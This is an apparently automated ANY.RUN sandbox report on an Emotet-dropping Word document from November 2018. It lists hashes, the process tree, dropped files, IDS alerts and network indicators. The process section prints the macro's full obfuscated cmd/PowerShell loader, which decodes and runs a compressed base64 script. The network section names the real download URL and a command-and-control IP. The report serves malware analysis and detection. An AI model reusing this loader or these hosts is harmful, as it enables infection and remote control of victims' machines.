analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

C535-70P6629.doc

Full analysis: https://app.any.run/tasks/bc5a95c7-557b-4a3a-8419-f4156b5ce151
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 09:24:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Madison-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

0436941648E33D3E432B27DDBB428DDF

SHA1:

70CFFCD8FAA76E0E1D4F03D80984F8D63468DF01

SHA256:

4240F4FFF31C7F566985FFE646DEB78668B1472311819A4248A889515951D6AD

SSDEEP:

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkDBsDPjEed72g:VZLocn1kp59gxBK85fBt+a9CdS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3632)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3632)
    • Application was dropped or rewritten from another process

      • 509.exe (PID: 1052)
      • lpiograd.exe (PID: 3352)
      • 509.exe (PID: 3044)
      • lpiograd.exe (PID: 4084)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2900)
    • Connects to CnC server

      • lpiograd.exe (PID: 4084)
    • EMOTET was detected

      • lpiograd.exe (PID: 4084)
    • FEODO was detected

      • lpiograd.exe (PID: 4084)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 4084)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 580)
    • Creates files in the user directory

      • powershell.exe (PID: 2900)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2900)
      • 509.exe (PID: 1052)
    • Starts itself from another location

      • 509.exe (PID: 1052)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3632)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:48:00
CreateDate: 2018:11:07 16:48:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Madison-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe lpiograd.exe no specs #FEODO lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3632"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\C535-70P6629.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
580CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2900POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3044"C:\Users\admin\AppData\Local\Temp\509.exe" C:\Users\admin\AppData\Local\Temp\509.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
1052"C:\Users\admin\AppData\Local\Temp\509.exe"C:\Users\admin\AppData\Local\Temp\509.exe
509.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3352"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe509.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
4084"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
Total events
1 676
Read events
1 262
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2E2F.tmp.cvr
MD5:
SHA256:
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6ZU6AUF2CSP236UAV2GK.temp
MD5:
SHA256:
2900powershell.exeC:\Users\admin\AppData\Local\Temp\509.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
1052509.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18362e.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3632WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$35-70P6629.docpgc
MD5:B94032DD8010A60278649C1579665692
SHA256:A8CFB75762B5E657E874CF4028BAC6C7BF4AF019DB516924570B3ECD0ADDC9BC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2900
powershell.exe
GET
301
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC
US
html
246 b
malicious
4084
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
2900
powershell.exe
GET
200
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC/
US
executable
132 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2900
powershell.exe
132.148.249.54:80
www.amenterprise.info
GoDaddy.com, LLC
US
suspicious
4084
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
www.amenterprise.info
  • 132.148.249.54
malicious

Threats

PID
Process
Class
Message
2900
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2900
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2900
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2900
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4084
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info